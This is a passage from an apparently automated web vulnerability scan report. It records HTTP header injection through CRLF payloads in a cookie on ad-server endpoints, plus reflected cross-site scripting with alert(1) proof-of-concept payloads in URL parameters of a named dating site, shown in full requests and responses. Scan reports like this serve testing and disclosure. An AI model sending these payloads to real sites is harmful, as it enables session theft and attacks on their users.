Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Tue, 23 Nov 2010 03:27:18 GMT
Server: Microsoft-IIS/6.0
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Content-type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Set-Cookie: eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWfBAg9QdG03ai0000o61wrWez3M9MXe05qO9MXhe3wUrNfpvx9Qbf0bKd0000820wrWeT709LaB0a4c9KVBK42UrIeQyI9KVU0bnA0000820wrHei.Q9EyK07ft0000o61wrpeZOX9Qdt03ai0000820wrWfpuV9Qas0bKd0000g410rWedj59B6M09Gc0000820wrfePZ99P6K07l00000g210rTfhPu9MHD0bnA0000820wrMdtFJ9MH60aVX0000820wrMe1YN9KVH08te0000820wrHff3e9P0S03sY0000820wrTeC519MH60aVX00008y8yrMeT809KVD0a4c9KVEm5xorHf2Ca9KVJ02Hn0000820wrHfGff9Qe30bPK9Qd9m5xorWdP239QaW0bfK0000820wrWewrC9P6K0bfD0000820wrTedd99KVI077T0000820wrHf5Kg9KTC07g60000820wrHeBgi9QdI04PT0000820wrW; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7grL0820wrH6OeH0820wrW6SKe0820wrH6VCF0820wrf7hMi0m5xorH7FL40o61wrW7fP70820wrW76AK0e3wUrN785p0820wrW6V2p0820wrH7nwv0820wrH745g061worW7nig0820wrH5suX0g210rT7yh30g410rW70vL0o61wrp7FLX0m5xorW74..0820wrT7yh50820wrW6UUT0820wrT7luQ0820wrM7hMh0K42UrI6E4C0gA92rM6E4D0820wrM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0t+c820wrT000000g_0vq9o61wrW0000001_0uv2820wrH0000001_0u3Je3wUrN0000020_0rUe820wrW0000001_0tIT820wrH0000080_0u6F820wrM0000040_0tye820wrW0000001_0uSU820wrW0000008_0tJNo61wrW0000001_0tUC820wrT0008000_0uf9820wrH0000w00_0vHUm5xorW0000001_0tUd820wrH0000001_0sTh820wrf0000001_0uXiS43orI0000002_0t8ko61wrp0000w00_0uRt820wrH00000g0_0upO61worW0000000_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0upO009p61worW0sJz02lBoC9yrM0t8k00iZo61wrp0vq905Zwo61wrW0uSU00m+820wrW0tJN00m+o61wrW0tye01xc820wrW0u3J01B9e3wUrN0tIT00cN820wrH0tUC0053820wrT0uXi00Y3S43orI0t+c00iZ820wrT0tUd001N820wrH0u6F004H820wrM0ppC00iZg210rT0rUe00m+820wrW0vHU00m+m5xorW0uv201xc820wrH0sTh00ai820wrf0uf900EM820wrH0uRt03HD820wrH; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0aVXoC9yrM07l0g210rT077T820wrH08te820wrH03aiw820rW03sY820wrT0a4cS43orI07fto61wrp02Hn820wrH0bfK820wrW03Gz61worW05qOe3wUrN09Gc820wrf0bKdo61wrW0bfDe3wUrT0bPKm5xorW0bnAg410rM04PT820wrW07g6820wrH; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_504f0
52c6ed00ba4
=4105167
Location: http://ds.serving-sys.com/BurstingRes/Site-1470/Type-0/3a3fa324-aacf-45d7-8247-47c3e005dc22.jpg
Content-Length: 0


1.6. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 3b58b%0d%0a1915b172d08 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=03b58b%0d%0a1915b172d08; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=03b58b
1915b172d08
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
Connection: close


1.7. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 7216b%0d%0a306de5af752 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=07216b%0d%0a306de5af752; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=07216b
306de5af752
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Connection: close


1.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload fcafc%0d%0abef809e8cc2 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2006011&PluID=0&w=300&h=250&ord=773648220124&ifrm=1&ucm=true&ncu=$$http://media.sensis.com.au/ADCLICK/CID=000345301f45920200000000/acc_random=773648220124/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=ABV1/pageid=365717345415/relocate=$$&z=0\ HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=0fcafc%0d%0abef809e8cc2; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 2916
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=0fcafc
bef809e8cc2
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWfBAg9QdG03ai0000o61wrWez3M9MXe05qO9MXhe3wUrNfpvx9Qbf0bKd0000820wrWeT709LaB0a4c9KVBK42UrIeQyI9KVU0bnA0000820wrHei.Q9EyK07ft0000o61wrpeZOX9Qdt03ai0000820wrWfpuV9Qas0bKd0000g410rWedj59B6M09Gc0000820wrfePZ99P6K07l00000g210rTfhPu9MHD0bnA0000820wrMdtFJ9MH60aVX0000820wrMe1YN9KVH08te0000820wrHff3e9P0S03sY0000820wrTeC519MH60aVX00008y8yrMeT809KVD0a4c9KVEm5xorHf2Ca9KVJ02Hn0000820wrHfGff9Qd70bPK9Qd9e3wUrWfEsU9Qe30bPK0000820wrWdP239QaW0bfK0000820wrWewrC9P6K0bfD0000820wrTedd99KVI077T0000820wrHf5Kg9KTC07g60000820wrHeBgi9QdI04PT0000820wrW; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7grL0820wrH6OeH0820wrW6SKe0820wrH6VCF0820wrf7hMi0m5xorH7FL40o61wrW7fP70820wrW76AK0e3wUrN785p0820wrW6V2p0820wrH7nwv0820wrH745g061worW7nig0820wrH5suX0g210rT7yh30g410rW70vL0o61wrp7FLX0m5xorW74..0820wrT7yh50820wrW6UUT0820wrT7luQ0820wrM7hMh0K42UrI6E4C0gA92rM6E4D0820wrM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0t+c820wrT000000g_0vq9o61wrW0000001_0uv2820wrH0000001_0u3Je3wUrN0000020_0rUe820wrW0000001_0tIT820wrH0000080_0u6F820wrM0000040_0tye820wrW0000001_0uSU820wrW0000008_0tJNo61wrW0000001_0tUC820wrT0008000_0uf9820wrH0000w00_0vHUm5xorW0000001_0tUd820wrH0000001_0sTh820wrf0000001_0uXiS43orI0000002_0t8ko61wrp0000w00_0uRt820wrH00000g0_0upO61worW0000000_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0upO009p61worW0sJz02lBoC9yrM0t8k00iZo61wrp0vq905Zwo61wrW0uSU00m+820wrW0tJN00m+o61wrW0tye01xc820wrW0u3J01B9e3wUrN0tIT00cN820wrH0tUC0053820wrT0uXi00Y3S43orI0t+c00iZ820wrT0tUd001N820wrH0u6F004H820wrM0ppC00iZg210rT0rUe00m+820wrW0vHU00m+m5xorW0uv201xc820wrH0sTh00ai820wrf0uf900EM820wrH0uRt03HD820wrH; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0aVXoC9yrM07l0g210rT077T820wrH08te820wrH03aiw820rW03sY820wrT0a4cS43orI07fto61wrp02Hn820wrH0bfK820wrW03Gz61worW05qOe3wUrN09Gc820wrf0bKdo61wrW0bfDe3wUrT0bPKm5xorW0bnAg410rM04PT820wrW07g6820wrH; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Connection: close

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

2. Cross-site scripting (reflected)  previous
There are 776 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://bigpond.eharmony.com.au/ [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpond.eharmony.com.au
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff716"%3balert(1)//ce6330e97f5 was submitted in the aid parameter. This input was echoed as ff716";alert(1)//ce6330e97f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=55653&aid=1000ff716"%3balert(1)//ce6330e97f5&pid=1000&ref=Dating HTTP/1.1
Host: bigpond.eharmony.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:27:00 GMT
Server: Apache/2.2.16 (Unix)
X-Powered-By: PHP/5.2.14
Set-Cookie: eh_aff_tracking=cid=55653|aid=1000ff716alert1ce6330e97f5|pid=1000|ref=Dating; expires=Thu, 23-Dec-2010 03:27:00 GMT; path=/; domain=.eharmony.com.au
Cache-Control: max-age=900
Expires: Tue, 23 Nov 2010 03:42:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerFront=3859747244.16671.0000; path=/
Set-Cookie: lbid=dd03e1ce-c870-46bf-4f21-93453fb42045;expires=Sun, 22-May-2011 03:27:00 GMT;path=/;domain=.eharmony.com.au;
Content-Length: 37512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><!-- PAGE OK --><head><meta http-equ
...[SNIP]...
"";
                       s.prop4="";
                       s.prop5="";
                       s.prop25="";                        
                       s.prop31="";
                       s.prop32="";

                       /* cid,aid,pid,aff_id */
                       s.prop8="55653";
                       s.evar8="55653";

                       s.prop7="1000ff716";alert(1)//ce6330e97f5";
                       s.evar7="1000ff716";alert(1)//ce6330e97f5";

                       s.prop33="1000";
                       s.evar33="1000";

                       s.prop48="";
                       s.evar48="";

                       /* Conversion variables */
                       s.products="";
                       s
...[SNIP]...

2.2. http://bigpond.eharmony.com.au/ [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpond.eharmony.com.au
Path:   /

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 228d2"%3balert(1)//66a421fe9a4 was submitted in the cid parameter. This input was echoed as 228d2";alert(1)//66a421fe9a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=55653228d2"%3balert(1)//66a421fe9a4&aid=1000&pid=1000&ref=Dating HTTP/1.1
Host: bigpond.eharmony.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
